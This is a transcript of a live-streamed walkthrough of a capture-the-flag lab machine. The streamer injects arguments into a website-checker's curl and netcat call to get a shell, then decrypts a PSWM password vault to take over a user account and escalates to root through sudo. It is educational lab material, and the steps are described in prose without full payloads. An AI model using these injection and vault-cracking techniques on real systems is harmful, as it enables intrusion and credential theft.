Kaido. Remaining credits, 1 million. Okay. The provided PHP code creates a web app that allows users to check websites down. Standard mode for URL checks and an expert mode for checking TCP port availability. The script checks if the expert mode parameter is present in the URL query string and if its value is TCP. If so, it displays a form where the user can input an IP address and a port number. This form submits via post request to the same page with expert mode enabled. If expert mode is not set or set to the TCP, a different form appears for user to enter URL check if it's accessible. For the expert mode, it validates the IP and port inputs. It uses filter var to validate that the IP is valid and the port is a number. For the standard mode, okay, if both IP and port are valid in expert mode, it uses netcat to check TCP connectivity. We can already run netcat ourselves. So I don't know how much helpful that is, but it's there, so I'm assuming it's something we're supposed to look at. But technically, I was able to run netcat already, I think. At least it seemed to be working for me. Okay. Well. .8.4.163 and 80. And it just gets a connect, and it says it is up, it's just you. So that's literally just running netcat. So it's just doing netcat 10.8.4.163 80 and then closing out. So what if we just add on to it something like that? Is how it works in my head. Maybe that's too simple, but that makes sense in my head. Let me try that. Oh, well. 80 dash. Oh, okay. So I can't actually add spaces here, but I bet if I intercept it, I can. Send it to replay so I can play around with it. And we'll just URL encode it ourselves a little bit. And we have a shell, ladies and gentlemen. That's what I'm talking about. Boom. All right, cool. Let's grab that. And we have a shell. Let's drop in the request there. So we have the request for our notes. And we can just show the beauty the beauty of this very basic shell, but hey, we were able to get a shell. I was not expecting that to work. It seemed too simple in my head for my, like, I just assumed that's how Netcat was working, and I'm glad my assumption was correct there. So honestly, not too terrible. If I would have not gotten that hint though from JKR, I would have gone into a pretty big rabbit hole of trying to do like internal port scanning with the SSRF, but cool. Oh, yo, I think that's JKR on stream over on Twitch anyways, A-Team JKR. I'm assuming that's you, so what is up, dude? Thank you again for the hint that you sent me. Now, let's go ahead and stabilize our shell. I always forget the syntax for stabilizing my shell, but there is a cool little extension called Hack Tools. If you've never heard of it, you can get it for Firefox or Chromium-based browsers. Let me go ahead and throw that in full screen mode, and we'll use this to stabilize our shell. Make sure we have Python. Okay, we have Python 3. Well, let's do this. Let's grab this right here. Like so, copy this, like so, and then it's Control Z, like so, grab that, like so, and then finally grab that. All right, now we have stabilized our shell, and we'll just add that to our notes. From here, we stabilized our shell. And I suppose I can even just grab a screenshot of those steps for my notes. Right, those are the steps right there. And we'll drop that in our notes. So now we have now exploited it. Let's go ahead. We have a section for enumeration. Let's make one for post-exploitation. Now that we're actually on the machine, and we'll begin checking things out. Bammerx said, what does shell stabilization do? It just makes it so it's an interactive shell. So we can do things like SSH if it's available. We can clear the terminal, things like that. Without an interactive shell, we have various issues. So let's do some basic enumeration. We'll do ID. We're not in any interesting group, sudo-l. We don't have a password for www data, so that's not going to be helpful for us unless we find credentials. My guess is we have to find credentials for the other user on this machine. And let's begin by looking at this. Actually, we have the flag. It would appear right there. And you're not supposed to showcase the flags on stream. So I am going to go ahead and go to just sharing my camera while I grab this flag real quick. And I got the flag. I'm going to go ahead and submit this flag over on Discord, and then I'll go back to sharing my screen. Give me just a moment. And there we go. I got credit for the flag. Beautiful. Clear my screen. And back on over here. Okay, so A-Team JKR said, to just jump in for a second, the hint was to point into parameter injection. You sort of found it accidentally when you gave the initial command. What it did and the reason for you seeing curl as user agent and not netcat wget. Curl is curling multiple URLs if you give it multiple ones. Ah, the semicolon gets escaped by PHP, so it will curl for 4 URLs. Localhost, semicolon, wget, and then for the URL. Ah. That makes sense. Okay, thank you for explaining that. And when I do the standalone video, I'll be sure to explain that. So really the key was using the next parameter. And if we would have, like, I wasn't aware of that myself, but I wonder if ChatGPT would have been able to point that out to me. Otherwise, Nephos is the true GPT. I'm just curious. Let's ask the GPT here. I have a web app that is using curl on the back end to check if a host is up. So I can do limited command injection into curl. Are there any flags with curl that would allow me to read files? Otherwise, you could fuzz for the expert mode, but so no, that would not work. That would not work. No, that wouldn't work. Nope. Neffel says, I read the man pages had run out of ideas. And he's still not even getting, he kind of gets it there. Etsy password. Okay. You're not authenticated. Shift settings. I'll have to apply my API key. I do have a GPT API. I don't, stop. I'll do that later. I'll apply my API key when I'm offline, but let me turn that off. Okay, good to know. Interesting stuff. And I'm actually going to grab this real quick from JKR and drop it in my notes here. And I might add it maybe right here. Okay, just so I remember that when I'm doing my own, going back to the machine another time. Which, by the way, guys, for those of you who do CTF machines, the best way to cement the material in your own mind is to teach it. So even if you're not comfortable jumping on video and making a fool of yourself on a live stream like I'm doing right now, start a write-up and publish write-ups, publish things on GitHub, whatever it is. But when you're forced to teach through a machine, it really helps you understand the methodology a little bit better, because there's things that when you go through a machine that just work and you're not quite sure why they work, but when you're forced to explain it, you're forced to do a little bit deeper digging into it and understand why it actually works the way it works. And that's really where the real learning happens. A little nugget of wisdom to share with you all there. Is it possible to link Kaido with the local LLM? I have no idea, but you can make your own plugins for Kaido, so I would assume so. You could make your own plugin that would communicate with the local LLM, would be my guess, but I don't know for sure, but there's plugins and stuff in a community store, so you can make your own plugin is what I'm thinking would be the way to do it. The next is really not needed. You can check on your shell by just giving 3 URLs after curl. Oh, gotcha. Okay, cool. That makes sense. I totally understand what you're saying there. I'm going to grab that as well. And then we'll dive into our post-exploitation. And I'll dig into that more when I make my standalone video. But thank you. Chris said, great nugget. Main reason why I make videos really helps me learn the content. Yeah, and Chris has some great walkthrough videos. So the Chris that you just saw in the chat, click on him and check out his YouTube profile. Actually, let me grab it if I can pull it up. Here, I'll just see if I can pull it up. I think it's just Chris. Hopefully that's good. I'm guessing blind. Yeah, there we go. If you guys do not follow Chris, check out his content. From now on, I will be silent and follow you. Feel free to talk, dude, especially if I'm in a crazy rabbit hole. But if you guys don't follow Chris, check out his content. You can see he releases content on a regular basis, has incredible audio and video quality, and does a really good job at explaining things. So if you do not follow Chris, make sure you do it. I really enjoy his content when I watch it. But okay, let's do some post-exploitation. Just sub to him. There we go. Beautiful. What I'm thinking, because if we ls home, we have this user called Alex here. I'm guessing we have to do some credential hunting as www data to find credentials for Alex, but those could be in a few different places. So let's go ahead and begin. You can see there's the user flag there. I'm not going to show that on stream, but if you are following along yourself on the machine, well, you can go ahead and grab that user flag for yourself. And what I like to do is begin whatever directory my shell drops into, start there and just LSLA your way back out to the root directory. I've noticed when I'm doing CTFs, especially on things like Hack the Box, they'll often make something obvious, like you'll drop into shell right here when you get your shell, and there might be a config.php, or there might be a .db, so a database file, SQLite database, and often you'll be able to find creds there. So just kind of a CTF tip, wherever you get your initial web shell in, begin your enumeration from that location. Otherwise, there's a good chance you might miss something. Here, it doesn't look like there's anything we're going to miss there. We already saw index.php. Probably nothing interesting in var outside of what we've already seen, things that we won't have access to. So now we're in the root directory. We can always check opt. That's a spot that you may be able to find things on a machine. In this case, there's nothing in opt. And sometimes you can just look at this and there'll be something that's not normally there on a machine. Here, I'm not seeing anything out of the ordinary for me right away. We can also just go over to home and see if we have any type of read access to it. And so we at least have read access to this, but you can see I'm not able to get to SSH. We don't have read access to that. We're not able to see bash history because that's going out to dev null. Nothing else in here. It looks like it would be real helpful to us right away. We can go over to cd temp, see if there's anything interesting there, and there really isn't. So now we can automate some of our enumeration with linps. So let's go ahead and open up this terminal. And if I cd over to, I think I have a web server one here with linps already there. We'll just host a very basic Python web server, and we'll see if linps discovers anything for us. If it doesn't, we'll continue our route of doing some manual enumeration, and we'll eventually stumble across something that will be helpful, I believe, hopefully. I believe in us. And you guys are always welcome to give ideas as I'm doing this. My only thing I ask is don't look at a walkthrough and then tell me like a spoiler from a walkthrough. But as you're looking at the things I'm looking at, if I miss something, feel free to shout it out in the chat. I'll keep my eye on the chat. If you've never streamed before, see, I already forgot my train of thought because I'm trying to do stuff while talking. It's a lot more difficult than it looks to work through a machine blindly and pay attention to chat and talk as you go. So if you've ever had the experience where you're at work and you're sharing your screen and all of a sudden you forget how to use a computer, take that but maximize it, because I have, looking over at Restream, over 80 people looking at my screen right now, and I'm trying to talk. So there's always a good chance I miss something obvious. So not if, but when I do that, feel free to call me out and say, hey, you missed this, you should check this out. Or hey, there's this other thing I check on Linux. My goal, guys, isn't to show you how smart I am. My goal is just to learn and to live stream while I learn. So I'm not mad at things like that. Hey, Evil Devil, I actually made an entire video to answer your question. Let me grab that video while we wait for this to run. If you go over to my YouTube page, which, real quick self-promotion again, YouTube is my main platform. So I do stream on LinkedIn and Twitch, but all my standalone videos and stuff are on my YouTube channel. You can see I have over 500 videos over here on YouTube, and I made a video recently, how to become an ethical hacker in 2024, a detailed guide. Not selling anything. I don't make sponsored videos. I'm not trying to sell you a stupid boot camp or silly coaching, but I'll drop a link to that video there. But I take 5 minutes to go in a pretty detailed answer on the question you just asked. Check out that video. I think that you will find it helpful. But okay. Let me get a drink of water. And let's see what we are able to find with linps. Gosh, my stuffiness and my cold's coming back a little bit. Pseudo version, nothing interesting there. We'll scroll through. I'm highly doubt it's going to be a kernel exploit. If it is, JKR is probably laughing because I just said I highly doubt it's going to be that, but I don't think it's going to. Obviously, AWS stuff isn't in scope for this. Do I think Ubuntu is a good OS for hacking? Yeah, so I actually use Ubuntu as my primary OS. So my main OS on my computer is Ubuntu, but generally speaking, I don't recommend doing any type of hacking from your primary OS. I always recommend doing it from within a virtual machine for a few reasons. One, if you're doing a pen test, it helps you clean up client information. You can kind of recreate that virtual machine via clone. for each new pen test that you do. And also there's a good chance you might break some dependencies or break something when you're trying out various tools. And it's a lot easier to just like start over with the virtual machine by reverting to a snapshot than trying to fix your host machine. So Ubuntu is great. You can set it up in a VM, and it's Debian based, so you can install all the same tools. There's actually a GitHub that I think is called like Offensive Ubuntu that will install a lot of the tools for you. But yeah, Kali is just convenient, right? There's nothing special about Kali in and of itself. Making sure I'm not missing anything up here. Nothing in cron tab that would be of interest to us. Now, there might be stuff in root, so we can use PSSpy, and we can see if there's anything running on a schedule that we might be able to mess around with. Nothing interesting here. Active ports. We don't have any ports that we're listening that we're not really aware of. That'd be one thing to check, but I'm not seeing it here. We have, of course, our Alex user that we were already aware of. Last logged in Sunday, September 15th. PHP stuff. I don't know if we'd find anything in access.log. There was no place for authentication on the web server, right? I don't think so. You know, like if there's a login and we could read access.log, that might be something worth looking into. I don't think I saw that. Hey, Tyler, I just finished playing Bandit, and Nat is over-the-wire war games. Do you have any advice? Yeah, try Hack Me or Hack the Box. Depends on your experience level. If you're more beginner, start with Try Hack Me. If you're less beginner, go to Hack the Box or Vulnlab. Vulnlab is what I'm doing now, but Vulnlab's a little more advanced. But if you can do Hack the Box, you can do Vulnlab for sure. But that's what I recommend. Okay, just slowly scrolling through. Once again, guys, if you see something I'm missing, please shout out in chat. No interesting capabilities that I see. And we saw that stuff. We can't get much from Alec. We have some database files, but those are typical Linux things there. I don't see any custom databases being used. Wow. JKR is going to make us do manual enumeration, it would appear. I'm not seeing anything in LinPs. Oh, I'm scrolling too fast. Shoot, that means I freaking missed something. All right, guys. You all tell me what I missed. I clearly missed something. Okay, so it's not going to be this stuff. All right. Do you have any suggestions on which certifications I should try to get for a help desk job? A+, Network Plus, and Security Plus. Start with the A+. If you can, get the full CompTIA trifecta. But for a help desk job, if you have the A+, Network Plus, and Security Plus via CompTIA, that's going to look really good on your resume and at least get you to the interview portion of the job. Is there anything with this here? I'm just going to grab some random stuff to look at. SSH piles and path. Okay, that's all typical. Interesting write files owned by me, readable by everyone, not in home. Netflix said, what about files that you own which are executable? Bruh, I don't know. I don't even know what that file is, to be honest. I don't know if that's what you're suggesting to me, but let me very quickly glance through some more things here. I don't think it's going to be capabilities. I don't think it's going to be that. I don't think it's going to be any of that. This might be interesting. Might be. I don't really know. Okay, I'm glancing through these again. The ones that might be interesting. All right. Did I customize my terminal? No, I did not. The colors are all just from LinPs. I didn't customize anything myself. Well, actually, we won't clear. We'll leave that in our command history. Let me check out some of this stuff. So first, what even is this? There's some passive vault file. I don't know what PSWM is. Hold up. It's probably just something. Oh, gosh. It's probably something normal, and I'm just silly. A simple command line password manager. Okay, maybe I'm not silly. A simple command line password manager written in Python. Built to be secure, encrypts your password with a key that only you know. Okay, how do you use it? After choosing a master password. Oh. Okay, we have a hint from JKR over in chat, which means maybe I'm in a rabbit hole right now. In your initial scroll, you were at one point saying, we already had a look and it did not give us anything. Well, LinPs would have shown something you missed before. What did I look at? I'm about to go rewatch my stream. Okay, let me retrace my steps. We got into the machine. Oh, no, I'm not in a rabbit hole. Okay, cool. All right, let me keep looking at this. So I've never heard of this before. So in running it, you'll be prompted to find a master password. So there's some type of master password. Unless we can pull that. I mean, if we own the binary, if we can somehow pull that or reset the master password. Oh, okay. If you forget, I should read the next paragraph. If you forget your master password, PSWM will give you the option to reset it after 3 failed attempts. This would we don't want to do that. This would delete all your saved passwords. We don't want to delete them because then we'll have to reset the box and impossible to encrypt without it. You should store your master password somewhere safe or choose something you will always remember. After choosing a master password, a password vault will be created as an encrypted file named PSWM inside there, home.local share PSWM. You can use any of the following commands to access your password vault. So we could just try this real quick and see if it prompts for a password. Okay, permission denied var www.local. Importing from CSV. Okay, so it's in this folder right there. Let me Okay, I think we're on to something. Let me just jot this down on my notes. Output. We discovered, reading through the documentation on this, it's a Python-based password manager. And I'll zoom in on my notes. I know it's pretty small there, but nothing interesting. I'm just documenting this all for my notes. And like I said before, this is legit how I document my notes, even when I'm offline just working through machines, because taking good notes is one of the best ways you can learn and come back to the information later. So looking at LIMPs, we discovered that. Reading through documentation, it's a Python-based password manager. And we can see that we have this area right here. And if we look back at the documentation, it says, after choosing a master password, a password vault will be created as an encrypted file named PSWM inside there. So if I cat that out, it should be like encrypted. Oh, go like that. And we have this, which goes to right here. So we have this password encrypted thing, and we'll go ahead and grab this and drop it in our notes. And we'll do some digging to see if it's possible to decrypt this. I haven't seen PSWM, so we might just have to read through a little bit of documentation. But let's grab this. And you know what? We'll even set a new header right here, and we'll call it like analyzing PSWM password manager. Do I have a video that shows how to set up your Kali box? I don't do anything special. My Kali is literally just you install Kali and now you have my box. I don't do anything special on my VMs besides that. Like, a lot of people even yell at me because I use like the built-in terminal. I don't even use tmux, guys. I just make new tabs and then name them. I know other people use tmux and they look cooler than me, but my brain can't process all of that. I need one tab at a time to look at. I'm the type of person that even when it comes to my internet stuff, I hate having multiple tabs open. So everything has to be very clean and like one thing at a time. Otherwise, it DOSes my brain. My brain gets a denial of service and stops working. But all right, let me do a little bit of reading on PSWM. So decrypt PSWM. Like, I don't think that's a hashcat recognized hash, right? Okay, just for the fun of it. Vulnlab down. I'm like 99.9% sure this won't work, but let's just try the easy thing first before I do anything else, right? We'll see if we can auto-detect anything. Okay, I assumed that wasn't going to work. That's fine. What's the name of my note editor? This is Notion. But we're going to have to do, hash identifier isn't going to be helpful, I don't think, guys, because this isn't a standard hash, and I'll even just do it to prove it, like, just to prove my point. With some of this stuff, there's some special things you need to do to decrypt it. Oh! Oh, PWM web app. Okay, I thought there was a hack the box machine that was similar. So let's do PS. That's the password manager. This is just the password manager right here. Server storing passwords. Okay, it's not going to be helpful. Oh! A simple decoder. What does it do? Oh, we just pass it the vault file and a word list, and it decrypts it. Bet that's what I need, right? Let me go ahead and just try this. That's the only change I think I would need to make. See if we can install whatever is needed for this. Now, what I just did here, for those of you who are confused what I just did, anytime you're installing random Python modules, there's always a decent chance you might break your Python install by running into dependencies issues and stuff like that. So anytime I'm messing with anything, just anything in Python, I try to set up a Python virtual environment. So that's all I did here. I used the virtual environment module, called it my environment. Then you just source it. And then we jump into a virtualized Python environment, and then we'll try to run the program from there. Boom. And it worked. That's what I'm talking about. Let me go ahead and drop some things in our notes before we move on from here. I then discovered a decryptor. We'll grab a link to that. Decrypt the password. We'll drop in the syntax right here for ourselves, which it is. I even show the step for installing crypto code in my notes, and we were able to get Alex's password right there. So let's go ahead and see. We can exit our Python virtual environment. Oh, I didn't mean to do it that way, but that's fine. Let's do SSH as Alex at down/vulnlab. Remember, there's password-based authentication, so we might be able to just authenticate as Alex. And there we go. We now have authentication as the Alex user. Beautiful. Now, I know I'm missing stuff in chat. Let me scroll up, see what I'm missing. Neffel said, did you see there was a Git repo that could decrypt it? Well, now I did. I didn't see it initially, no. Yo, what up, Ty? What up, Thick Colo? Good to have you here. Fegu said, at what time do you normally start the streaming? Today I missed the beginning. It's very random. I apologize for the randomness of my time, but guys, my streaming schedule is totally controlled by my kids. Sometimes my kids go to bed good at night. Sometimes they don't go to bed good at night. So I have an 8-year-old and a 5-year-old. Bedtimes can turn into battles, and I just never know. So really, my streaming start time is anywhere from 9 p.m. Central Standard Time to about 10:30 at night. If I don't have them in bed by 10:30 or I'm battling with them, I probably won't be on stream. But usually, I can get them in bed by like 9:30 or 10 o'clock Central Standard Time. But the other reason people are like, Tyler, can you stream at different times? And I can. That's just the reality of being a parent. I work during the day. I work from home, but I work during the day. And then as soon as I'm off work, I want to hang out with my kids, not sit on my computer. So I hang out with my family till they all kind of go to bed. And then that's when I stream. I can't stream during the day when they're awake because 8-year-olds and 5-year-olds are allowed. And it would sound like there's elephants above my head stomping and jumping and running around and having fun. So for those of you who are like, hey, can you change your stream time? Nope. Like, it's literally outside of my control. This is the only time I have to stream. Do you do Python 2 virtual environments? On old CTF boxes, I constantly run the Python 2 scripts. You can just ask ChatGPT to convert the Python 2 script to Python 3. I've had a lot of good luck doing that. Oh, yeah, Lucky just said that, so we do the same thing. Is this a creative way of getting us to hit the notification bell? Absolutely. Hit that notification bell. You don't like using ChatGPT to help you overcome CTF challenges. I've tried that. It doesn't always work. Yeah, I don't know. I mean, you can run Python too. I just don't do it that way, so I don't have much advice there. But all right, let's begin our enumeration afresh. Very basic stuff. ID. We are in. Oh shoot. I'm root. I didn't realize we were going to be in the pseudo group. Well, I'm pretty sure I just solved this machine. Let me stop sharing my screen for a moment while I grab root.txt. And there we go. I have the flag successfully. I'm going to go ahead and throw it in Discord so I get credit for it. And boom. I have successfully solved the machine. Let me clear that out. And just for proof, here we are. I am root on the down machine. I just grabbed root.txt, and we have fully compromised the machine. That one was a lot of fun, and I think it was a no offense to build, all right? I learned a lot through build, but this was a breath of fresh air compared to build. Still learned a lot, encountered things I've never seen, but not to the point that I was like fully stuck banging my head on my keyboard. So shout out to JKR for creating what is really an incredible machine. Seriously, thank you for this. And for all of you who have been part of this journey from the beginning, we started this machine last night, solved it now, and it really didn't take too long. I would say from beginning to end, it took me maybe 2 hours. I think we spent about 30 minutes last night doing enumeration. Actually even less than that, because we spent the first 30 minutes of this stream making that standalone video and me beating everyone at a typing race. So maybe it took me about an hour and a half total to solve this machine, which I think the easy rating is a good rating for it. Still not easy compared to other platforms. Like try Hack Me, this would definitely be a medium or hard machine. Hack the Box, probably an easy machine, maybe lower medium machine, I'm not sure, but I think the rating is fair for this one. Really well done, no crazy rabbit holes. Probably the difficult part would be recognizing this. It was just something I hadn't seen before, and that's why it stood out to me. I don't know if I would have noticed this. Well, I know I wouldn't have. I went through all of LinP's and didn't see this. JKR is like, hey, you scrolled too fast. So that's where I was like, oh, I clearly missed something. So I took a second look, and this just stood out to me because I didn't know what this binary was, and I thought it was worth at least looking into to see what we were able to do with it. But really fun machine. Hopefully you guys enjoyed something in the process of this live stream. And once again, just a reminder. Oh, it showed in LinP's in the home from Alex. Oh, that's crazy. I didn't even see that. That's funny. And if I would have enumerated him more, I would have seen that as well, right? I saw .local and I just kind of ignored it. So just some lessons learned from my own enumeration and methodology. Things that I missed there that I'll keep in mind for the future. I'm sure I'll miss them again, but as long as I keep missing them, realize I miss them, eventually I'll recognize them the next time around. But thank you guys for hanging out. Once again, my live streams will be like this, where we go into a machine blind, kind of work our way through it and figure it out, share my full thought process and methodology, but then I'll make a shorter standalone video. So tomorrow night, if I stream again, which I'm seeing how many days in a row I can stream. So my plan is to stream again tomorrow night. And tomorrow night's stream, we'll make a short standalone video showing how to solve this machine from beginning to end. And I'll do my best to teach through some of the methodology there, but that will be kind of a recap for those of you who have been on the live stream. That's going to be a standalone video for the people who just watch the standalone videos on YouTube. But thank you all for hanging out with me. Before we jump off, a few things. Number one, self-promotion. All right, that's what we always have to go to. If you do not sub to me on YouTube, once again, this is my main platform. Would appreciate your support. Whoops, I just got jumped out here, but would appreciate your support over on YouTube. YouTube is my primary platform. I don't do anything behind paywalls. If you're not part of Hack Smarter, that's another place you should join. If you go to hacksmarter.org, I'll drop a link to this as well. This is our community. No paywalls, open to anyone and everyone. We offer career coaching. We have a CTF team. We do weekly meetings. Once again, everything's free. I don't believe in paywalls for helping people break into the industry. So check out the Hack Smarter community. I think you'll find it one of the best and friendliest offensive security ethical hacking communities around. But if you go over to hacksmarter.org, all you have to do is cat out discord.text, and then you have a link, an invite link to our Discord community. So if you're not there, go ahead and join. I'll drop a direct link as well to Discord over in the chat so you guys can join in. J. Pablo said, hey, how's the CWEE path going so far? I'm super curious about that path. It's been a while since I've returned to it just because I've been doing other things, but I can actually show you guys what that path all covers. I don't think that's breaking any rules from Hack the Box. So let me just log in real quick to my Academy account. And I can at least show you the topics the Senior Web Pen Tester path covers and the ones that I've completed for those who are curious. Give me just a second. If Hack the Box wants to work, which, there we go. Log me in. Okay, here we go. So I don't think I'm showing anything I'm not supposed to show, but what J. Pablo is referring to is over on Hack the Box Academy, the job role path. You can see I've done all of the Bug Bounty Hunter path that's completed. I've done all the Pen Tester path that's completed. The Senior Web Pen Tester path is what they're referring to. You can see I have about 50% of the way through it. I don't know what this is going to show, so let me stop sharing my screen for a moment. Okay, here we go. It's not showing too much. So the Senior Web Pen Tester path is sort of like the OSWEE through OffSec, but better quality in my opinion. But it covers both dynamic analysis with some pretty complex techniques not covered in their tier 2 pathways, but also covers some static code review things as well. So you can see we have injection attacks. It also requires you to do your own scripting as well. You write some of your own scripts for these things, but that covers XPath injection, LDAP, HTML, and PDF generations, and things like that. You also do some custom script writing. We have NoSQL injection. We have attacking authentication mechanisms that I completed. That's JWT, OAuth, and SAML. We have advanced cross-site scripting in CSRF that I have also completed, as you can see there. We have HTTP and TLS attacks, which is another one that I have completed. Some attacks that I don't mess with much. HTTP misconfigurations, web cache poisoning, host header vulnerabilities, session puzzling, session variable overloading, another thing that I've completed, but that's where I've left off. So I haven't done HTTP attacks, blind SQL injection, white box pen testing, modern web exploitation, deserialization, white box, etc., etc. So I really am halfway through it. Really do enjoy the path, but like, guys, it is hard. It is far, far, far from easy. So I don't recommend it as a first path. I recommend going through the Bug Bounty path and the Pen Tester path first before diving into the Senior Web Pen Tester path there. Tucker said, you're a great underrated channel. You deserve more reach. Though from India. Dude, thank you so much for the kind words. I appreciate it. But okay, what we're going to do now is we're going to find somebody to raid. If you're new to Twitch terminology, to raid someone is we take all of our viewers and we go watch another person on Twitch to show our support, and only those on Twitch can be part of the raid. So I have a favor to ask of all of you. Is Hackmaster? I don't know what Hackmaster is, Mathis. But I have a favor for all of you, and that's to come join me on Twitch. So if you're watching on YouTube or LinkedIn, come over to Twitch, even if you're not going to be there for long, just to show our support in a raid. Let me drop a link to my Twitch in the chat if you're not already there. Twitch.tv HackSmarter. It looks like we have most of you are on YouTube. So for those of you on YouTube, which is the majority of you, do me a favor and just jump over to Twitch so you can be part of this raid. Grab my headphones. Let me see if there's anyone online. One helpful website, if you enjoy streams like this, is infosecstreams.com, maintained by my friend GoProYo, and it looks like I am the only one on InfoSec Streams. So let me just go to my host computer, and I'm going to see who is just on Twitch. If anyone has a Twitch streamer that is on right now that you recommend, let me know. Oh, it's Hack Smarter Oh, is Hack Smarter not working? Error 403. I do have a WAF in front of Hack Smarter because, well, I made a video about this. Someone tried to DDoS my freaking website and they sent like 23 million requests in like a few minutes to it, like something crazy like that. Cost me $20 because I'm hosting it in AWS and I didn't have much security in front of it, but I now have security. But if you'll get rate limited really easily. It'll block any suspicious IP. So if you get blocked accessing hacksmarter.org, it's because you're suspicious. So apologies, but I don't feel like paying more money when people try to DDoS my freaking free website. All right, I'm looking at Twitch right now, and I'm not seeing anybody on, guys. Clearly, other people have lives on Friday night. They don't just sit in front of their computer and stream. But if anyone has a recommendation of someone on Twitch I should raid, speak up now or forever hold your peace. I'm going to jump over to, maybe we'll do software and gaming stuff. What up, Mars Electron? Apologies for anyone just joining the stream. We are going to be jumping off shortly. I'm just looking for somebody to raid over on Twitch. Give me just a moment. We'll look at software and game development. If you guys want to see what I'm looking at, I mean, this is all I'm doing. I'm scrolling through Twitch right now and see if there's anything fun going on. I try to raid like smaller streamers, so not people who normally have a bunch of people watching, but there's nobody on, guys. At least nobody I know. So I'm looking through to see if anyone's doing any type of hacking, cybersecurity stuff, but I'm seeing no one. So I guess I'm not going to raid anyone. Apologies, but I can't find anyone to raid. Y'all can check it out yourself. Can you share a YouTube link? Yeah, let me drop my YouTube link again. Sub to me on YouTube. That is my main platform, but I do live stream on YouTube, Twitch, and LinkedIn. I'm trying to do it every single night. We'll see if I'm able to keep that up. Probably not. We'll see how many days I can go. I don't know how many, but this is day number 3 in a row. I count that as a win, and we solved the down machine that we were working on. So I am going to call it a night now. Do some video editing on that standalone video we made. But guys, thank you again for taking the time to hang out with me. Seriously blows my mind that this many people take the time to watch me stumble around on a computer and share what I'm learning. I've said this a few times, but I remember when I first started streaming, there was one viewer, and it was like me on my smartphone making sure the stream was working. So I remember when I would have like 3 viewers, I was in awe that there was 3 people, even if there were bots, that had my stream pulled up. And the fact that now every time I stream, there's all these people watching. You guys hang out in chat. You help me along. Thank you for your kindness, for your generosity. Thank you for just being here, especially on a Friday night. But I am going to sign off. I will hopefully catch you guys tomorrow night. But thank you for watching.